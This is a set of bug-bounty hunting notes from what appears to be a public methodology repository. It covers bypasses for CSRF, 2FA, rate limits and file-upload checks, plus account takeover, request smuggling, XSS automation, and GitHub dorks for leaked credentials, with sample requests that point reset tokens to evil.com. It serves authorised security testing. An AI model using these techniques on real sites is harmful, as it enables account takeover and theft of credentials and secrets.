Guys, I Tried My Best To Share all The CSRF Bypasses I Know. 4 | I Hope This Will Help You. 5 | 6 | Csrf will be login, logout, resetpass, change password, add-cart, like, comment, profie change, user details change, blance transffer, subscription ect 7 | ``` 8 | -Change Request Method [POST => GET] 9 | 10 | -Remove Total Token Parameter 11 | 12 | -Remove The Token, And Give a Blank Parameter 13 | 14 | -Copy a Unused Valid Token , By Dropping The Request and Use That Token 15 | 16 | -Use Own CSRF Token To Feed it to Victim 17 | 18 | -Replace Value With Of A Token of Same Length 19 | 20 | -Reverse Engineer The Token 21 | 22 | -Extract Token via HTML injection 23 | 24 | -Switch From Non-Form `Content-Type: application/json` or `Content-Type: application/x-url-encoded` To `Content-Type: form-multipart` 25 | 26 | -Change/delete the last or frist character from the token 27 | 28 | -Change referrer to Referrer 29 | 30 | -Bypass the regex 31 | If the site is looking for “bank.com” in the referer URL, maybe “bank.com.attacker.com” or “attacker.com/bank.com” will work. 32 | 33 | -Remove the referer header (add this in your payload or html code) 34 | 35 | -Clickjacking 36 | 37 | (If you aren’t familiar with clickjacking attacks, more information can be found https://owasp.org/www-community/attacks/Clickjacking.) 38 | Exploiting clickjacking on the same endpoint bypasses all CSRF protection. Because technically, the request is indeed originating from the legitimate site. If the page where the vulnerable endpoint is located on is vulnerable to clickjacking, all CSRF protection will be rendered irrelevant and you will be able to achieve the same results as a CSRF attack on the endpoint, albeit with a bit more effort. 39 | 40 | 41 | 42 | ``` 43 | 44 | ### References 45 | [Medium Writeup](https://medium.com/swlh/intro-to-csrf-cross-site-request-forgery-9de669df03de) 46 | 47 | [Medium Writeup](https://medium.com/swlh/attacking-sites-using-csrf-ba79b45b6efe) 48 | 49 | [Medium Writeup](https://medium.com/swlh/bypassing-csrf-protection-c9b217175ee) 50 | 51 | 52 | ### Authors 53 | * [@SMHTahsin33](https://twitter.com/SMHTahsin33) 54 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 55 | * [@remonsec](https://twitter.com/remonsec) 56 | * [@tamimhasan404](https://twitter.com/tamimhasan404) 57 | 58 | -------------------------------------------------------------------------------- /Recon/Github_Dorking.md: -------------------------------------------------------------------------------- 1 | # GitHub Recon: 2 | 3 | ## Specific Org search: 4 | - "Org_name" password 5 | - "org_name" key 6 | - "org_name" api 7 | - "org_name" “filename:vim_settings.xml” 8 | - "org_name" "Authorization: Bearer" 9 | - "org_name" "Language: PHP" 10 | 11 | ## Sensitive Files search: 12 | 13 | - filename:manifest.xml 14 | - filename:travis.yml 15 | - filename:vim_settings.xml 16 | - filename:database 17 | - filename:secrets.yml password 18 | - filename:.esmtprc password 19 | - filename:passwd path:etc 20 | - filename:dbeaver-data-sources.xml 21 | - path:sites databases password 22 | - filename:config.php dbpasswd 23 | 24 | ## Specific Language based search: 25 | 26 | - language:python username 27 | - language:php username 28 | - language:sql username 29 | - language:html password 30 | - language:perl password 31 | - language:shell username 32 | - language:java api 33 | - HOMEBREW_GITHUB_API_TOKEN language:shell 34 | 35 | ## API keys, Token & Hard-Coded Password search: 36 | 37 | - SecretKey / Secrect_key / skey 38 | - privatekey / private_key / pkey 39 | - user_secret / userSecret 40 | - admin_passwd / adminpasswd / adminPass etc 41 | - “api keys” 42 | - authorization_bearer: 43 | - oauth 44 | - auth 45 | - authentication 46 | - client_secret 47 | - api_token: 48 | - “api token” 49 | - client_id 50 | - password 51 | - user_password 52 | - user_pass 53 | - passcode 54 | - client_secret 55 | - secret 56 | - password hash 57 | - OTP 58 | - user auth 59 | 60 | ## Username search: 61 | 62 | - user:name (user:admin) 63 | - org:name (org:google type:users) 64 | - in:login ( in:login) 65 | - in:name ( in:name) 66 | - fullname:firstname lastname (fullname: ) 67 | - in:email (data in:email) 68 | 69 | ## GitHub Dorks for Finding Information using Dates: 70 | 71 | - created:<2012–04–05 72 | - created:>=2011–06–12 73 | - created:2016–02–07 location:iceland 74 | - created:2011–04–06..2013–01–14 in:username 75 | 76 | ## Extension based search: 77 | 78 | - extension:pem private 79 | - extension:ppk private 80 | - extension:sql mysql dump 81 | - extension:sql mysql dump password 82 | - extension:json api.forecast.io 83 | 84 | ## Automated Tools: 85 | 86 | 1. [TruffleHog](https://github.com/dxa4481/truffleHog) 87 | 2. [WatchTower](https://radar.nightfall.ai/) 88 | 3. [Dorki](https://dorki.attaxa.com/) 89 | 90 | ## NOTE : 91 | If you find any API key or credentials or any other sensitive information under test directory then do not report it because that is an intended behaviour. 92 | 93 | ## Author: 94 | [Mr._fr3qu3n533](https://twitter.com/mr_fr3qu3n533) 95 | -------------------------------------------------------------------------------- /MFA_Bypasses/2FA_Bypass.md: -------------------------------------------------------------------------------- 1 | # 2FA Bypass 2 | 3 | * 1:- Password Reset Disable 2FA 4 | * 2:- No Rate limit 5 | * 3:- Sending all alphabets instead of number 6 | * 4:- Status Code Manipulation 7 | * 5:- 2FA bypass by substituting part of the request from the session of another account. 8 | ``` 9 | If a parameter with a specific value is sent to verify the code in the request, try sending the value from the request of another account. 10 | 11 | For example, when sending an OTP code, the form ID/user ID or cookie is checked, which is associated with sending the code. If we apply the data from the parameters of the account on which you want to bypass code verification (Account 1) to a session of a completely different account (Account 2), receive the code and enter it on the second account, then we can bypass the protection on the first account. After reloading the page, 2FA should disappear. 12 | ``` 13 | * 6:- Bypass 2FA using the “memorization” functionality. 14 | 15 | `Many sites that support 2FA, have a “remember me” functionality. It is useful when the user doesn’t want to enter a 2FA code on subsequent login windows. And it is important to identify the way in which 2FA is “remembered”. This can be a cookie, a value in session/local storage, or simply attaching 2FA to an IP address.` 16 | * 7:- OTP Leakage in Response 17 | * 8:- Bypassing 2fa Via OAuth mechanism ( Mostly not Applicable one ) 18 | 19 | `Site.com requests Facebook for OAuth token > Facebook verifies user account > Facebook send callback code > Site.com logs a user in (Rare case)` 20 | * 9:- Bypassing 2fa using response manipulation 21 | ``` 22 | Enter correct OTP -> Intercept & capture the response -> logout -> enter wrong OTP -> Intercept & change the response with successful previous response -> logged in 23 | ``` 24 | * 10:- CSRF on 2FA Disable Feature. 25 | ``` 26 | Signup for two account -> Login into attacker account & capture the disable 2FA request -> generate CSRF POC with .HTML extension -> Login into victim account and fire the request — — -> It disable 2FA which leads to 2FA Bypass. 27 | ``` 28 | * 11:- Bypass 2FA by Adding null or 000000 29 | * 12:- Bypass 2FA by Batch API request 30 | ``` 31 | Suppose if 2FA parameter like "code" of "OTP" is going with the request, add same parameter into the request multiple times like BATCH Mode for REST APi. 32 | ``` 33 | 34 | * https://twitter.com/FaniMalikHack/status/1395042756108505092 35 | * https://twitter.com/FaniMalikHack/status/1402627994833805313 36 | 37 | ## Twitte :- [Fani Malik](https://twitter.com/FaniMalikHack) 38 | -------------------------------------------------------------------------------- /File_Upload/old_file_upload_bypass.md: -------------------------------------------------------------------------------- 1 | # Bypassing File Uploads 2 | 3 | Suppose you have a limitation that you can only upload in a few formats like PDF, JPEG, JPG, ….But what if you can upload a PHP file by defying the Upload mechnism and validation of file type check. let me tell you if someone can upload a PHP file then its game over for the website as he will upload a php shell and can easily perform an RCE , or Worst will simply gain a reverse shell on the server. 4 | 5 | > __How does Bypass work__ 6 | 7 | Well it depends on which kind of validation the system is using …it is just verfying the extension ?? if its just doing that then it becomes very easy to bypass and upload a PHP file or something malicious. suppose we have to upload a JPG file so the extension must be something.jpg 8 | 9 | --- 10 | 11 | 12 | ### 1. Bypassing Normal extension 13 | Now what we can do is we can upload a file which looks like this something.php.jpg or somethings.jpg.php. 14 | ### 2. Bypassing the magic Byte validation. 15 | 16 | For this method we use polygots. Polyglots, in a security context, are files that are a valid form of multiple different file types. For example, a GIFAR is both a GIF and a RAR file. There are also files out there that can be both GIF and JS, both PPT and JS, etc. 17 | 18 | so while we have to upload a JPEG file type we actaully can upload a PHAR-JPEG file which will appear to be a JPEg file type to the server while validating. the reason is the file PHAR-JPEg file has both the JPEG header and the PHP file also. so while uploading it didn’t get detected and later after processing the PHP file can be used to exploit. 19 | 20 | And at last Uploading a shell to some random websites for fun is not really cool so don’t ever try untill unless you have the permission to test. 21 | 22 | ## 3. Path traversal Upload 23 | upload file with filename as: 24 | 25 | ../test.png 26 | ..%2Ftest.png 27 | 28 | ----- 29 | 30 | 31 | **How the bypass was possible?** 32 | 33 | 1. Create a malicious file with an extension that is accepted by the application. 34 | 2. Upload that file and click on send. 35 | 3. Capture the request in any proxy tool, edit the file extension to the malicious extension that you want. In some cases, you might need to change the content type of a file. 36 | 4. Forward the request to the server. 37 | 38 | ------ 39 | 40 | **Test PDF upload functionality.** 41 | 42 | - [https://github.com/jonaslejon/malicious-pdf](https://github.com/jonaslejon/malicious-pdf) 43 | 44 | Resources :- 45 | 46 | - [File upload Bypass pdf](https://harshitsengar.in/resources/File%20Upload%20Bypass%20.pdf) 47 | -------------------------------------------------------------------------------- /Rate_limit/README.md: -------------------------------------------------------------------------------- 1 | ## RATE LIMIT FLAWS 2 | This flaw leveraged by malicious actors to perform DDoS, brute force, and bot attacks on APIs. Although it's more than that. 3 | ##### NOTE: Some organisation `keep rate-limit bug as OOS`, So check their policy before testing. 4 | ## Rate-limit Checks 5 | 1 - Rate limit on Forget password 6 | 2 - Rate limit on Sign-up Page 7 | 3 - Rate limit on Login Page 8 | 4 - Rate limit on Invite user normal 9 | 5 - Rate limit on Invite user using MACROS 10 | 6 - Rate limit on 2FA 11 | 7 - Rate-limit on Comment and sent messages 12 | 8 - Use your own brain somewhere 13 | 14 | ## Bypass-Techniques 15 | #### 1 - Append NULL characters at the end of the request : 16 | `%00, %0d%0a, %0d, %0a, %09, %0C, %20, ( )space` 17 | 18 | POST /signup/new/1337 HTTP/1.1 19 | HOST: api.target.com 20 | ... 21 | email=hacker%40gmail.com&password=12345678%00 22 | #### 2 - Append NULL characters at the end of the Path : 23 | `%00, %0d%0a, %0d, %0a, %09, %0C, %20, ( )space` 24 | `POST /profile/post/like%00 HTTP/2` 25 | 26 | #### 3) Using Custom `HTTP headers` 27 | X-Originating-IP: 127.0.0.1 28 | X-Forwarded-For: 127.0.0.1 29 | X-Remote-IP: 127.0.0.1 30 | X-Remote-Addr: 127.0.0.1 31 | X-Client-IP: 127.0.0.1 32 | X-Host: 127.0.0.1 33 | X-Forwared-Host: 127.0.0.1 34 | 35 | --- 36 | X-Originating-IP: 127.0.0.2 37 | X-Forwarded-For: 127.0.0.2 38 | X-Remote-IP: 127.0.0.2 39 | X-Remote-Addr: 127.0.0.2 40 | X-Client-IP: 127.0.0.2 41 | X-Host: 127.0.0.2 42 | X-Forwared-Host: 127.0.0.2 43 | --- 44 | X-Originating-IP: 127.0.1 45 | X-Forwarded-For: 127.0.1 46 | X-Remote-IP: 127.0.1 47 | X-Remote-Addr: 127.0.1 48 | X-Client-IP: 127.0.1 49 | X-Host: 127.0.1 50 | X-Forwared-Host: 127.0.1 51 | 52 | #### 4 - Changing the value of `User-Agent:` 53 | UserAgent: 'CHANGED_USERAGENT' 54 | 55 | #### 5 - Adding Custom `parameter` in GET request 56 | `GET /accout/passwordreset/?test=test` 57 | 58 | #### 6 - Change request body, (`JSON -> XML`) or vice versa 59 | Use Burp Extension --> `Content Type Converter` 60 | 61 | #### 7 - Changing API version , 62 | `/api/v2/user/reset_pw --> /api/v1/user/reset_pw or /api/v3/user/reset_pw` 63 | 64 | #### 8 - Bypass through Exploiting Logic flaw on Login page, 65 | - Take Attacker and Victim account 66 | - Identify how many enough login attempts in application 67 | - For-eg. if application gives only 3 attempts, then 68 | - By using burp macros, send the attackers login request 1 time and victim login request 2 time, or alternatively 69 | - If NOT blocked, Repeat the process until we get victim's password 70 | #### 9 - Try to find `Origin IP` of the Application 71 | - Shodan 72 | - Censys 73 | - Visit the application with it's IP address 74 | - Do your own research -------------------------------------------------------------------------------- /Rate_limit/RateLimitBypass.md: -------------------------------------------------------------------------------- 1 | # Rate Limit Bypass Techniques 2 | ## There are two ways to do that 3 | - Customizing HTTP Methods 4 | - Adding Headers to Spoof IP 5 | 6 | ## 1. Customizing HTTP Methods 7 | - If the request goes on GET try to change it to POST, PUT, etc., 8 | - If you wanna bypass the rate-limit in API's try HEAD method. 9 | 10 | ## Rate Limit Bypass using Header 11 | 12 | Use the following Header just Below the Host Header 13 | 14 | ``` 15 | X-Forwarded-For: IP 16 | X-Forwarded-IP: IP 17 | X-Client-IP: IP 18 | X-Remote-IP: IP 19 | X-Originating-IP: IP 20 | X-Host: IP 21 | X-Client: IP 22 | 23 | #or use double X-Forwarded-For header 24 | X-Forwarded-For: 25 | X-Forwarded-For: IP 26 | ``` 27 | ## Adding HTTP Headers to Spoof IP and Evade Detection 28 | - These are Headers I've collected so far to Bypass Rate-Limits. 29 | ``` 30 | X-Forwarded: 127.0.0.1 31 | X-Forwarded-By: 127.0.0.1 32 | X-Forwarded-For: 127.0.0.1 33 | X-Forwarded-For-Original: 127.0.0.1 34 | X-Forwarder-For: 127.0.0.1 35 | X-Forward-For: 127.0.0.1 36 | Forwarded-For: 127.0.0.1 37 | Forwarded-For-Ip: 127.0.0.1 38 | X-Custom-IP-Authorization: 127.0.0.1 39 | X-Originating-IP: 127.0.0.1 40 | X-Remote-IP: 127.0.0.1 41 | X-Remote-Addr: 127.0.0.1 42 | ``` 43 | 44 | ## Rate Limit Bypass using Special Characters 45 | 46 | - Adding Null Byte ( %00 ) at the end of the Email can sometimes Bypass Rate Limit. 47 | - Try adding a Space Character after a Email. ( Not Encoded ) 48 | - Some Common Characters that help bypassing Rate Limit : %0d , %2e , %09 , %20 , %0, %00, %0d%0a, %0a, %0C 49 | - Adding a slash(/) at the end of api endpoint can also Bypass Rate Limit. `domain.com/v1/login` -> `domain.com/v1/login/` 50 | 51 | 52 | ## Using IP Rotate Burp Extension 53 | 54 | - Try changing the user-agent, the cookies... anything that could be able to identify you 55 | - If they are limiting to 10 tries per IP, every 10 tries change the IP inside the header. 56 | Change other headers 57 | - Burp Suite's Extension IP Rotate works well in many cases. Make sure you have Jython installed along. 58 | 59 | - Here You'll everything you need - https://github.com/PortSwigger/ip-rotate 60 | 61 | 62 | ## You can find some more here - [Check this out](https://medium.com/bugbountywriteup/bypassing-rate-limit-like-a-pro-5f3e40250d3c) 63 | ## You can find more with screenshot https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd 64 | 65 | # Reference 66 | * https://twitter.com/m4ll0k2/status/1294983599943540738/photo/1 67 | * https://twitter.com/SalahHasoneh1/status/1287366496432332800 68 | * https://twitter.com/SMHTahsin33/status/1295054667613757441 (all in one must check) 69 | 70 | # Authors: 71 | * [Keshav Malik](https://www.linkedin.com/in/keshav-malik-22478014a)
72 | * [0xd3vil](https://linkedin.com/in/0xd3vil)
73 | * [Virdoex_hunter](https://twitter.com/Virdoex_hunter) 74 | * [@0xCyberPirate](https://twitter.com/0xCyberPirate) 75 | -------------------------------------------------------------------------------- /Account_Takeovers_Methodologies/Account_Takeovers_Methods.md: -------------------------------------------------------------------------------- 1 | 2 | ## Chaining Session Hijacking with XSS 3 | ``` 4 | 1.I have added a session hijacking method in broken authentication and session management. 5 | 2.If you find that on target. 6 | 3.Try anyway to steal cookies on that target. 7 | 4.Here I am saying look for xss . 8 | 5.If you find xss you can steal the cookies of victim and using session hijacking you can takeover the account of victim. 9 | ``` 10 | ## No Rate Limit On Login With Weak Password Policy 11 | ``` 12 | So if you find that target have weak password policy, try to go for no rate limit attacks in poc shows by creating very weak password of your account. 13 | 14 | (May or may not be accepted) 15 | ``` 16 | ## Password Reset Poisioning Leads To Token Theft 17 | ``` 18 | 1.Go to password reset funtion. 19 | 2.Enter email and intercept the request. 20 | 3.Change host header to some other host i.e, 21 | Host:target.com 22 | Host:attacker.com 23 | also try to add some headers without changing host like 24 | X-Forwarded-Host: evil.com 25 | Referrer: https://evil.com 26 | 4.Forward this if you find that in next request attacker.com means you managed to successfully steal the token. :) 27 | ``` 28 | ## Using Auth Bypass 29 | ``` 30 | Check out Auth Bypass method, there is a method for OTP bypass via response manipulation, this can leads to account takeovers. 31 | 1.Enter the wrong auth code / Password 32 | 2.Capture a auth request in burpsuite and send it to repeater 33 | 3.Check for the resoponse 34 | 4.Change the respone by manipulating the following parameters 35 | {“code”:”invalid_credentials”} -> {“code”:”valid_credentials”} 36 | {“verify”:”false”} -> {“verify”:”true”} 37 | 38 | 39 | ``` 40 | ## Try For CSRF On 41 | ``` 42 | 1.Change Password function. 43 | 2.Email change 44 | 3.Change Security Question 45 | ``` 46 | ## Token Leaks In Response 47 | 48 | * So there are multiple ways to do it but all are same. 49 | 50 | * So I will sharing my method that I have learnt here . 51 | 52 | * Endpoints:(Register,Forget Password) 53 | 54 | * Steps(For Registration): 55 | ``` 56 | 1. For registeration intercept the signup request that contains the data you have entered. 57 | 2. Click on action -> do -> intercept the response to this request. 58 | 3. Click forward. 59 | 4. Check response if that contains any link, any token or OTP. 60 | ``` 61 | ------------------------ 62 | * Steps (For password reset): 63 | ``` 64 | 1. Intercept the forget password option. 65 | 2. Click on action -> do -> intercept the response to this request. 66 | 3. Click forward. 67 | 4. Check response if that contains any link,any token or OTP. 68 | ``` 69 | 70 | ## Reference: 71 | * Various Source From Google,Twitter,Medium 72 | * https://avanishpathak.medium.com/an-account-takeover-vulnerability-due-to-response-manipulation-e23fe629bd1 73 | 74 | ## Author 75 | * [@Virdoex_hunter](https://twitter.com/Virdoex_hunter) 76 | * [@v3daxt](https://twitter.com/v3daxt) 77 | -------------------------------------------------------------------------------- /Password_Reset_Functionality/Password_Reset_Flaws_by_Sm4rty.md: -------------------------------------------------------------------------------- 1 | # Common security flaws in password reset functionality compiled from twitter, writeups, disclosed reports: 2 | 3 | ## 1. Password Reset Token Leak Via Referrer 4 | 5 | - The HTTP referer is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested. 6 | The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed 7 | 8 | Exploitation: 9 | ``` 10 | Request password reset to your email address 11 | Click on the password reset link 12 | Dont change password 13 | Click any 3rd party websites(eg: Facebook, twitter) 14 | Intercept the request in burpsuite proxy 15 | Check if the referer header is leaking password reset token. 16 | ``` 17 | 18 | ## 2. Sending an array of email addresses instead of a single email address. 19 | 20 | - In this attack the The attacker can send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address and It could lead to full account takeover. 21 | 22 | ``` 23 | POST https://example.com/api/v1/password_reset HTTP/1.1 24 | Original Request Body: 25 | {“email_address”:”xyz@gmail.com”} 26 | Modified Request Body: 27 | {“email_address”:[“admin@breadcrumb.com”,”attacker@evil.com”]} 28 | ``` 29 | - In this way, the password reset link get send to both victim as well as attacker. And the attacker can use it to gain Full account Takeover. 30 | 31 | ## 3. Bruteforcing OTP for Reseting Password. 32 | 33 | - Now, In case The password reset functionality of application is based on OTP validation. 34 | - Many program accepts No rate limit as acceptable risk. So, Bruteforcing OTP is worth trying. 35 | - You can reset the password of an account by intercepting the request for OTP validation and bruteforcing the 6 digit number. 36 | - Using this, it is possible to change and reset the password of any account, by changing the user data and brute-forcing the reset OTP. 37 | 38 | Exploitation: 39 | ``` 40 | 1. Start the Burp Suite and Intercept the password reset request 41 | 2.Send to intruder 42 | 3.Use null payload 43 | ``` 44 | 45 | ## 4. Full Account Takeover via Changing Email And Password of any User through API Parameters 46 | 47 | Exploitation: 48 | ``` 49 | 1. Attacker have to login with their account and Go to the Change password function 50 | 2. Start the Burp Suite and Intercept the request 51 | 3. After intercepting the request sent it to repeater and modify parameters Email and Password 52 | POST /api/changepass 53 | [...] 54 | ("form": {"email":"victim@email.tld","password":"12345678"}) 55 | ``` 56 | 57 | 58 | ## 5. Response manipulation: Replace Bad Response With Good One 59 | 60 | - Look for Request and Response like these 61 | ``` 62 | HTTP/1.1 401 Unauthorized 63 | (“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”) 64 | ``` 65 | - Change Response 66 | ``` 67 | HTTP/1.1 200 OK 68 | (“message”:”success”,”statusCode:200,”errorDescription”:”Success”) 69 | ``` 70 | -------------------------------------------------------------------------------- /HTTP_Desync/http_desync.md: -------------------------------------------------------------------------------- 1 | # HTTP Desync or Request Smuggling: 2 | - Basics: 3 | "HTTP request smuggling is a technique for interfering with the way a web site processes sequences of HTTP requests that are received from one or more users. Request smuggling vulnerabilities are often critical in nature, allowing an attacker to bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users. " -Portswigger 4 | 5 | 6 | ## Where ?: 7 | 8 | - Any Endpoint might be Vulnerable to HTTP Desync attack. 9 | 10 | - You can Find the Vulnerability on Non-endpoints as well, But impact is always much higher on Sensitive Endpoints ;) 11 | --- 12 | ### Step 1: 13 | 14 | * Go To Repeater tab, and try various Timing based payloads to confirm the bug. More Explaination here: 15 | 16 | [Finding the Vulnerability](https://portswigger.net/web-security/request-smuggling/finding) 17 | 18 | ### Step 2: 19 | 20 | * Once you have successfully discovored the bug, you can chain it with various bugs eg. Account Takeover by stealing session IDs, Cross side Scripting Attacks in User-Agent Header,etc. More Description here: 21 | 22 | [Exploiting the Vulnerability](https://portswigger.net/web-security/request-smuggling/exploiting) 23 | 24 | --- 25 | ## Tools: 26 | 27 | 1. [defparam`s_smuggler.py](https://github.com/defparam/smuggler) 28 | 29 | `Usage:` 30 | * Smuggler.py : 31 | 32 | `cat alive_urls.txt | python3 smuggler.py -m GET/POST #either GET or POST ` 33 | 34 | OR 35 | 36 | ` python3 smuggler.py -u https://example.com -m GET/POST ` 37 | 38 | 2. [Burp_smuggler](https://github.com/PortSwigger/http-request-smuggler) (also available in BApp store) 39 | 40 | ## More Info: 41 | 42 | ### Topics 43 | 44 | https://paper.seebug.org/1049/ (Recommended !) 45 | 46 | [Portswigger Topic](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn) 47 | 48 | [Portswigger Lab](https://portswigger.net/web-security/request-smuggling) 49 | 50 | ### Reports (Hackerone): 51 | 52 | [Report 1](https://hackerone.com/reports/737140) 53 | 54 | [Report 2](https://hackerone.com/reports/867952) 55 | 56 | [Report 3](https://hackerone.com/reports/498052) 57 | 58 | [Report 4](https://hackerone.com/reports/526880) 59 | 60 | [Report 5](https://hackerone.com/reports/771666) 61 | 62 | [Report 6](https://hackerone.com/reports/753939) 63 | 64 | [Report 7](https://hackerone.com/reports/648434 ) 65 | 66 | [Report 8](https://hackerone.com/reports/740037) 67 | 68 | ## Writeups (Medium.com): 69 | 70 | [Article 1](https://medium.com/@ricardoiramar/the-powerful-http-request-smuggling-af208fafa142) 71 | 72 | [Article 2](https://medium.com/cyberverse/http-request-smuggling-in-plain-english-7080e48df8b4) 73 | 74 | [Article 3](https://medium.com/@cc1h2e1/write-up-of-two-http-requests-smuggling-ff211656fe7d) 75 | 76 | [Article 4](https://medium.com/bugbountywriteup/crossing-the-borders-the-illegal-trade-of-http-requests-57da188520ca) 77 | 78 | ## Extra: 79 | 80 | [A Brief Video About Req. Smuggling](https://youtu.be/gzM4wWA7RFo) 81 | 82 | ### Author: 83 | [Neutron__](https://twitter.com/Neutron__) 84 | ###### If you think something was missed, feel free to add/modify/delete it :) 85 | -------------------------------------------------------------------------------- /XSS/Automated_XSS.md: -------------------------------------------------------------------------------- 1 | # Automating XSS Detection Using Dalfox, WaybackURLs, and GF Patterns 2 | 3 | ## Prerequisites: Installing Go on Your Machine 4 | 5 | Before proceeding, ensure that **Go** is installed on your system. You can install it using the following commands: 6 | 7 | ```bash 8 | sudo apt install -y golang 9 | export GOROOT=/usr/lib/go 10 | export GOPATH=$HOME/go 11 | export PATH=$GOPATH/bin:$GOROOT/bin:$PATH 12 | source .bashrc 13 | ``` 14 | 15 | --- 16 | 17 | ## Hunting Blind XSS Using Dalfox 18 | 19 | To detect blind XSS vulnerabilities, follow these steps: 20 | 21 | 1. Use **WaybackURLs** to extract URLs for the target. 22 | 2. Use **GF patterns** to identify possible XSS-vulnerable parameters. 23 | 3. Utilize **Dalfox** to detect XSS. 24 | 25 | ### Execution Command: 26 | ```bash 27 | waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && \ 28 | cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt 29 | ``` 30 | 31 | --- 32 | 33 | ## Hunting Reflected XSS 34 | 35 | To identify reflected XSS vulnerabilities, follow these steps: 36 | 37 | 1. Extract URLs using **WaybackURLs**. 38 | 2. Use **qsreplace** to inject payloads and analyze responses. 39 | 40 | ### Execution Command: 41 | ```bash 42 | waybackurls testphp.vulnweb.com | grep '=' | qsreplace '">' | \ 43 | while read host; do 44 | curl -s --path-as-is --insecure "$host" | grep -qs "" && \ 45 | echo "$host \033[0;31m Vulnerable" 46 | done 47 | ``` 48 | 49 | --- 50 | 51 | ## Identifying Parameters That Do Not Filter Special Characters 52 | 53 | The following command checks whether parameters accept special characters without proper sanitization: 54 | 55 | ```bash 56 | echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt 57 | cat waybackurls.txt | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | \ 58 | qsreplace '"><()' | tee combinedfuzz.json && \ 59 | cat combinedfuzz.json | while read host; do 60 | curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && \ 61 | echo -e "$host \033[91m Vulnerable \e[0m \n" || \ 62 | echo -e "$host \033[92m Not Vulnerable \e[0m \n" 63 | done | tee XSS.txt 64 | ``` 65 | 66 | --- 67 | 68 | ## Downloading the Required Tools 69 | 70 | The following tools are required for this process: 71 | 72 | | Tool | GitHub Repository | 73 | |------|------------------| 74 | | **Dalfox** | [Dalfox](https://github.com/hahwul/dalfox) | 75 | | **WaybackURLs** | [WaybackURLs](https://github.com/tomnomnom/waybackurls) | 76 | | **GF** | [GF](https://github.com/tomnomnom/gf) | 77 | | **GF Patterns** | [GF Patterns](https://github.com/1ndianl33t/Gf-Patterns) | 78 | | **qsreplace** | [qsreplace](https://github.com/tomnomnom/qsreplace) | 79 | 80 | A complete script can be found here: [QuickXSS](https://github.com/theinfosecguy/QuickXSS) 81 | 82 | --- 83 | 84 | ## Contact Information 85 | 86 | For any questions or further discussions, feel free to reach out on Twitter: 87 | 88 | - [@g0t_rOoT_](https://twitter.com/g0t_rOoT_) 89 | - [@Fani Malik](https://twitter.com/fanimalikhack) 90 | - [@Faizee Asad](https://twitter.com/faizee_asad) 91 | - [@Prince Prafull](https://twitter.com/princeprafull3) 92 | 93 | --- 94 | 95 | *Enhanced and reformatted for HowToHunt repository by [remonsec](https://x.com/remonsec)* 96 | -------------------------------------------------------------------------------- /Sensitive_Info_Leaks/Github-dorks.md: -------------------------------------------------------------------------------- 1 | **GitHub Dork List :** 2 | 3 | **GitHub Dorks for Finding Files** 4 | 5 | - filename:manifest.xml 6 | - filename:travis.yml 7 | - filename:vim_settings.xml 8 | - filename:database 9 | - filename:prod.exs NOT prod.secret.exs 10 | - filename:prod.secret.exs 11 | - filename:.npmrc _auth 12 | - filename:.dockercfg auth 13 | - filename:WebServers.xml 14 | - filename:.bash_history 15 | - filename:sftp-config.json 16 | - filename:sftp.json path:.vscode 17 | - filename:secrets.yml password 18 | - filename:.esmtprc password 19 | - filename:passwd path:etc 20 | - filename:dbeaver-data-sources.xml 21 | - path:sites databases password 22 | - filename:config.php dbpasswd 23 | - filename:prod.secret.exs 24 | - filename:configuration.php JConfig password 25 | - filename:.sh_history 26 | - shodan_api_key language:python 27 | - filename:shadow path:etc 28 | - JEKYLL_GITHUB_TOKEN 29 | - filename:proftpdpasswd 30 | - filename:.pgpass 31 | - filename:idea14.key 32 | - filename:hub oauth_token 33 | - HEROKU_API_KEY language:json 34 | - HEROKU_API_KEY language:shell 35 | - SF_USERNAME salesforce 36 | - filename:.bash_profile aws 37 | - extension:json [api.forecast.io](http://api.forecast.io/) 38 | - filename:.env MAIL_HOST=[smtp.gmail.com](http://smtp.gmail.com/) 39 | - filename:wp-config.php 40 | - extension:sql mysql dump 41 | - filename:credentials aws_access_key_id 42 | - filename:id_rsa or filename:id_dsa 43 | 44 | ---------- 45 | 46 | 47 | **GitHub Dorks for Finding Languages** 48 | 49 | - language:python username 50 | - language:php username 51 | - language:sql username 52 | - language:html password 53 | - language:perl password 54 | - language:shell username 55 | - language:java api 56 | - HOMEBREW_GITHUB_API_TOKEN language:shell 57 | 58 | ------ 59 | 60 | 61 | **GiHub Dorks for Finding API Keys, Tokens and Passwords** 62 | 63 | - api_key 64 | - “api keys” 65 | - authorization_bearer: 66 | - oauth 67 | - auth 68 | - authentication 69 | - client_secret 70 | - api_token: 71 | - “api token” 72 | - client_id 73 | - password 74 | - user_password 75 | - user_pass 76 | - passcode 77 | - client_secret 78 | - secret 79 | - password hash 80 | - OTP 81 | - user auth 82 | 83 | 84 | ----- 85 | 86 | **GitHub Dorks for Finding Username**s 87 | 88 | - user:name (user:admin) 89 | - org:name (org:google type:users) 90 | - in:login ( in:login) 91 | - in:name ( in:name) 92 | - fullname:firstname lastname (fullname: ) 93 | - in:email (data in:email) 94 | - GitHub Dorks for Finding Information using Dates 95 | - created:<2012–04–05 96 | - created:>=2011–06–12 97 | - created:2016–02–07 location:iceland 98 | - created:2011–04–06..2013–01–14 in:username 99 | 100 | ----- 101 | 102 | **GitHub Dorks for Finding Information using Extension** 103 | 104 | - extension:pem private 105 | - extension:ppk private 106 | - extension:sql mysql dump 107 | - extension:sql mysql dump password 108 | - extension:json [api.forecast.io] (http://api.forecast.io/) 109 | - extension:json [mongolab.com] (http://mongolab.com/) 110 | - extension:yaml [mongolab.com] (http://mongolab.com/) 111 | - [WFClient] Password= extension:ica 112 | - extension:avastlic “[support.avast.com] (http://support.avast.com/)” 113 | - extension:json googleusercontent client_secret 114 | -------------------------------------------------------------------------------- /CORS/CORS.md: -------------------------------------------------------------------------------- 1 | # 